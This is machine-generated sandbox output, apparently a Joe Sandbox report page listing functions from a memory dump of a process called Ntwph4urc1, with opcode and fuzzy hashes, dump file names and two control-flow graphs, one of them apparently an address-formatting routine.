                                              Function 36982F60 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a477e95e00438f680e9c3c035f6580ff096c028cdfb9271710a9373bae45149b
                                              • Instruction ID: 731d8997ffb408034976bd7ddc2317d184c032f54b800da75f22769672f1398f
                                              • Opcode Fuzzy Hash: a477e95e00438f680e9c3c035f6580ff096c028cdfb9271710a9373bae45149b
                                              • Instruction Fuzzy Hash: 2090026121250042D10471584508746008947E1211F55C457A3168518CC52E8D655129
                                              Function 36982CA0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f7bd1cef6efb58f954543e81ec43f0e70ae4f7b4c5dc3472baf2ea1d7c328c7
                                              • Instruction ID: dbfea95ae450c15b22da8154cd3265c0a13822ae7d9517eb1a1f91505130be98
                                              • Opcode Fuzzy Hash: 2f7bd1cef6efb58f954543e81ec43f0e70ae4f7b4c5dc3472baf2ea1d7c328c7
                                              • Instruction Fuzzy Hash: 2290023120250402D1007598550C686004947E0311F55D456A6038519EC66A89956135
                                              Function 36982CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 370b9c82b4526fcd949e15af3877a06b6f1a79dc80c4230a4b07a6ecdc389d9b
                                              • Instruction ID: f1aab7f305b9e212fdcc89be61844a404e4e617ff95ee72390bc7215bc725744
                                              • Opcode Fuzzy Hash: 370b9c82b4526fcd949e15af3877a06b6f1a79dc80c4230a4b07a6ecdc389d9b
                                              • Instruction Fuzzy Hash: B590022160650402D1407158551C746005947D0211F55D456A1038518DC65E8B5966A5
                                              Function 36982CF0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: abe6444950a8ecf6168d72636153a8d51eda9b25fda456350e546a7db1ee21ef
                                              • Instruction ID: 1f5dbbc849384a29da5c7efa5a82ab02392b0e38efe12d7ff34d046142cdad27
                                              • Opcode Fuzzy Hash: abe6444950a8ecf6168d72636153a8d51eda9b25fda456350e546a7db1ee21ef
                                              • Instruction Fuzzy Hash: 7890023120250403D1007158560C747004947D0211F55D856A143851CDD65B89556125
                                              Function 36982C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f600a6d1d62c92c026ec8b302f11f8f37ec0b0edc2f97602ecff891dbcb8dd0
                                              • Instruction ID: eade15912fd21465ad5456e51f0d17c6af71833a0c99c6da2128b07cb3b64919
                                              • Opcode Fuzzy Hash: 6f600a6d1d62c92c026ec8b302f11f8f37ec0b0edc2f97602ecff891dbcb8dd0
                                              • Instruction Fuzzy Hash: 4490023120258802D1107158850878A004947D0311F59C856A543861CD869A89957125
                                              Function 36982C60 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c8263dccdaea35562900e7af77d1ee5cf8f715ba31da4f80b7f758231b034158
                                              • Instruction ID: 86dbcab6866cbbb666bedf594c9ee740583bcac92fd076018a1a677e5b52d6e9
                                              • Opcode Fuzzy Hash: c8263dccdaea35562900e7af77d1ee5cf8f715ba31da4f80b7f758231b034158
                                              • Instruction Fuzzy Hash: 8A90023120250842D10071584508B86004947E0311F55C45BA1138618D861AC9557525
                                              Function 36982DB0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed833f3841c6ba37d4f93632335d268719cf490422b4fc4ac85abcf7aef883d6
                                              • Instruction ID: e1bc8481dccb6e5c46efc9804f9c2345104e6fc2304584ec9436edbc738a8ee3
                                              • Opcode Fuzzy Hash: ed833f3841c6ba37d4f93632335d268719cf490422b4fc4ac85abcf7aef883d6
                                              • Instruction Fuzzy Hash: E390023124250402D14171584508646004D57D0251F95C457A1438518E865A8B5AAA65
                                              Function 36982DD0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf9d180dc499bb9a81a07d8dd79cd02caafd4cb239fd690fc4c0baf1b789756e
                                              • Instruction ID: 499a6521dea52612df13548547ec5941c1851fd8ab29afb036dccc93cea0f0c2
                                              • Opcode Fuzzy Hash: cf9d180dc499bb9a81a07d8dd79cd02caafd4cb239fd690fc4c0baf1b789756e
                                              • Instruction Fuzzy Hash: B8900221243541525545B1584508547404A57E0251795C457A2428914C852B995AD625
                                              Function 36982D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f9627218ddaa87c0d9a06c9893cf04122abfae36a443062b0f273eb3920dc80
                                              • Instruction ID: 6fa33668ac7804fec5fa73186ca248b09eb40ba41580dab48afc172dd61b40e7
                                              • Opcode Fuzzy Hash: 9f9627218ddaa87c0d9a06c9893cf04122abfae36a443062b0f273eb3920dc80
                                              • Instruction Fuzzy Hash: 7290022921350002D1807158550C64A004947D1212F95D85AA102951CCC91A896D5325
                                              Function 36982D00 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3afab0a463c4e6d2e82bbde6ccf726ed5b8a0ef9766a9f940dc7f116658866af
                                              • Instruction ID: e27901c65825828b9fc8154eba003f2ae0dfc1021ca73dccaba62dbf635f59e1
                                              • Opcode Fuzzy Hash: 3afab0a463c4e6d2e82bbde6ccf726ed5b8a0ef9766a9f940dc7f116658866af
                                              • Instruction Fuzzy Hash: BC90022120654442D1007558550CA46004947D0215F55D456A2078559DC63A8955A135
                                              Function 36982D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e9d8494cc20ab39825c390fc2167340996d03a680f3b8a15d37c153cb4d21cf0
                                              • Instruction ID: 1f6152ba464214a21201746905427193a53be096f159b7e16b2e87eb96c5bff2
                                              • Opcode Fuzzy Hash: e9d8494cc20ab39825c390fc2167340996d03a680f3b8a15d37c153cb4d21cf0
                                              • Instruction Fuzzy Hash: 2890022130250003D1407158551C646404997E1311F55D456E1428518CD91A895A5226
                                              Function 36982AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: faef0f0a95f7bf0f86bc1f3f8078a0b642c01b6e9a4d9b26dd365e6b8e2db73f
                                              • Instruction ID: a53739844d5b98a2b8f8b22cdccc601427bde44481ee3bb4a174ef1144d44bcd
                                              • Opcode Fuzzy Hash: faef0f0a95f7bf0f86bc1f3f8078a0b642c01b6e9a4d9b26dd365e6b8e2db73f
                                              • Instruction Fuzzy Hash: 899002A1202640924500B2588508B4A454947E0211B55C45BE2068524CC52A89559139
                                              Function 36982AD0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 931a71672ef7ad7627350931b0fb9e5693574e68c5978d1cbb282daca1efa14f
                                              • Instruction ID: bacc24e1571f4a572566f944a51973971a762177e31e6e010e9e00b4bfc88559
                                              • Opcode Fuzzy Hash: 931a71672ef7ad7627350931b0fb9e5693574e68c5978d1cbb282daca1efa14f
                                              • Instruction Fuzzy Hash: 44900225212500030105B5580708547008A47D5361355C466F2029514CD62689655125
                                              Function 36982AF0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78bc9ead49b72613dcee609d60deedc4c64aeb8f2ad156a93cd685bbe37da400
                                              • Instruction ID: f8b2f2f736293ce03c86eeb333a28b50ac928bf23ca461cfddbf9a42cd2d51cd
                                              • Opcode Fuzzy Hash: 78bc9ead49b72613dcee609d60deedc4c64aeb8f2ad156a93cd685bbe37da400
                                              • Instruction Fuzzy Hash: 37900225222500020145B558070854B048957D6361395C45AF242A554CC62689695325
                                              Function 36982B80 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 73f2be3b78f5a9d5584222f6d2cf5d55a08a0819c64da5d33d1c07f61efb72dc
                                              • Instruction ID: f76da963febbe57adae5d4d37c641ccba71b74b7ffa0d3d1e64658fb48a04f64
                                              • Opcode Fuzzy Hash: 73f2be3b78f5a9d5584222f6d2cf5d55a08a0819c64da5d33d1c07f61efb72dc
                                              • Instruction Fuzzy Hash: BB90023120250802D104715849086C6004947D0311F55C456A7038619E966A89957135
                                              Function 36982BA0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 517d7d00be18779f5695997abc698f6a8a5f72b8a90541ba2e329bc8707fd7ae
                                              • Instruction ID: 97b6852f1c863bb23bc86b76909cbfa033581f204b91f923fcf1bc5e042ef9a3
                                              • Opcode Fuzzy Hash: 517d7d00be18779f5695997abc698f6a8a5f72b8a90541ba2e329bc8707fd7ae
                                              • Instruction Fuzzy Hash: 0C90023160650802D15071584518786004947D0311F55C456A1038618D875A8B5976A5
                                              Function 36982BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3467b823c091891acb195973376119d8518310a08555ea409b616e1d83779a82
                                              • Instruction ID: 78c00a5da4fbac09ba6cd7428566812a8da2432f34bce260a3400c409d039b0d
                                              • Opcode Fuzzy Hash: 3467b823c091891acb195973376119d8518310a08555ea409b616e1d83779a82
                                              • Instruction Fuzzy Hash: 8690023120250802D1807158450868A004947D1311F95C45AA1039618DCA1A8B5D77A5
                                              Function 36982BE0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c1bf9d25a037035180dd16032f4039163bf4705d463fa0fc4c87d42485db38f
                                              • Instruction ID: fe4169ff3b4421f0f9d981cd2c632540bb1ba7cfd35ccbad3e60306664190b8f
                                              • Opcode Fuzzy Hash: 7c1bf9d25a037035180dd16032f4039163bf4705d463fa0fc4c87d42485db38f
                                              • Instruction Fuzzy Hash: D190023120654842D14071584508A86005947D0315F55C456A1078658D962A8E59B665
                                              Function 36982B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9b1cc494c52ff43800adfd1f3e3d6c7a61d5e145a542ef6fc3a63da715ed1ac
                                              • Instruction ID: c7b840a70a953ffa8d8c2366ccc2727e4fb4c1e1d8f278121703f3cb9077aeb8
                                              • Opcode Fuzzy Hash: b9b1cc494c52ff43800adfd1f3e3d6c7a61d5e145a542ef6fc3a63da715ed1ac
                                              • Instruction Fuzzy Hash: 3D90026120350003410571584518656404E47E0211B55C466E2028554DC52A89956129
                                              Function 36982C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: 6476ee1a06925f03f3ce0137ae653d30b15f626524a7e622b956c5e2bdc76a49
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Function 36982890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1125 36982890-369828b3 1126 369828b9-369828cc 1125->1126 1127 369ba4bc-369ba4c0 1125->1127 1129 369828dd-369828df 1126->1129 1130 369828ce-369828d7 1126->1130 1127->1126 1128 369ba4c6-369ba4ca 1127->1128 1128->1126 1131 369ba4d0-369ba4d4 1128->1131 1133 369828e1-369828e5 1129->1133 1130->1129 1132 369ba57e-369ba585 1130->1132 1131->1126 1134 369ba4da-369ba4de 1131->1134 1132->1129 1135 36982988-3698298e 1133->1135 1136 369828eb-369828fa 1133->1136 1134->1126 1137 369ba4e4-369ba4eb 1134->1137 1140 36982908-3698290c 1135->1140 1138 369ba58a-369ba58d 1136->1138 1139 36982900-36982905 1136->1139 1141 369ba4ed-369ba4f4 1137->1141 1142 369ba564-369ba56c 1137->1142 1138->1140 1139->1140 1140->1133 1143 3698290e-3698291b 1140->1143 1145 369ba50b 1141->1145 1146 369ba4f6-369ba4fe 1141->1146 1142->1126 1144 369ba572-369ba576 1142->1144 1147 369ba592-369ba599 1143->1147 1148 36982921 1143->1148 1144->1126 1149 369ba57c call 36990050 1144->1149 1151 369ba510-369ba536 call 36990050 1145->1151 1146->1126 1150 369ba504-369ba509 1146->1150 1154 369ba5a1-369ba5c9 call 36990050 1147->1154 1152 36982924-36982926 1148->1152 1167 369ba55d-369ba55f 1149->1167 1150->1151 1151->1167 1156 36982928-3698292a 1152->1156 1157 36982993-36982995 1152->1157 1158 3698292c-3698292e 1156->1158 1159 36982946-36982966 call 36990050 1156->1159 1157->1156 1163 36982997-369829b1 call 36990050 1157->1163 1158->1159 1164 36982930-36982944 call 36990050 1158->1164 1174 36982969-36982974 1159->1174 1163->1174 1164->1159 1170 36982981-36982985 1167->1170 1174->1152 1176 36982976-36982979 1174->1176 1176->1154 1177 3698297f 1176->1177 1177->1170
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 120290c4a2e435de4b9ac69c2b4955694e71179761b8e6fc5faf5dabbf2d6ff4
                                              • Instruction ID: 6f2dec728f6fad68030361916febb22e3d181c3bb9bbd9e549324104ad391b7e
                                              • Opcode Fuzzy Hash: 120290c4a2e435de4b9ac69c2b4955694e71179761b8e6fc5faf5dabbf2d6ff4
                                              • Instruction Fuzzy Hash: 9951E7B5E00216BFEB10DF99C98097EFBB8FB482407608169E465DB641D674DE50CBE4
                                              Function 369F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1178 369f2410-369f2433 1179 369f24ec-369f24ff 1178->1179 1180 369f2439-369f243d 1178->1180 1182 369f2513-369f2515 1179->1182 1183 369f2501-369f250a 1179->1183 1180->1179 1181 369f2443-369f2447 1180->1181 1181->1179 1185 369f244d-369f2451 1181->1185 1184 369f2517-369f251b 1182->1184 1183->1182 1186 369f250c 1183->1186 1187 369f251d-369f252c 1184->1187 1188 369f2538-369f253e 1184->1188 1185->1179 1189 369f2457-369f245b 1185->1189 1186->1182 1190 369f252e-369f2536 1187->1190 1191 369f2540 1187->1191 1192 369f2543-369f2547 1188->1192 1189->1179 1193 369f2461-369f2468 1189->1193 1190->1192 1191->1192 1192->1184 1194 369f2549-369f2556 1192->1194 1195 369f246a-369f2471 1193->1195 1196 369f24b6-369f24be 1193->1196 1199 369f2558-369f2562 1194->1199 1200 369f2564 1194->1200 1197 369f2484 1195->1197 1198 369f2473-369f247b 1195->1198 1196->1179 1201 369f24c0-369f24c4 1196->1201 1203 369f2489-369f24ab call 36990510 1197->1203 1198->1179 1202 369f247d-369f2482 1198->1202 1204 369f2567-369f2569 1199->1204 1200->1204 1201->1179 1205 369f24c6-369f24ea call 36990510 1201->1205 1202->1203 1217 369f24ae-369f24b1 1203->1217 1207 369f258d-369f258f 1204->1207 1208 369f256b-369f256d 1204->1208 1205->1217 1213 369f25ae-369f25d0 call 36990510 1207->1213 1214 369f2591-369f2593 1207->1214 1208->1207 1211 369f256f-369f258b call 36990510 1208->1211 1224 369f25d3-369f25df 1211->1224 1213->1224 1214->1213 1215 369f2595-369f25ab call 36990510 1214->1215 1215->1213 1221 369f2615-369f2619 1217->1221 1224->1204 1225 369f25e1-369f25e4 1224->1225 1226 369f25e6-369f2610 call 36990510 1225->1226 1227 369f2613 1225->1227 1226->1227 1227->1221
                                              APIs
                                              Strings
                                              Memory Dump Source
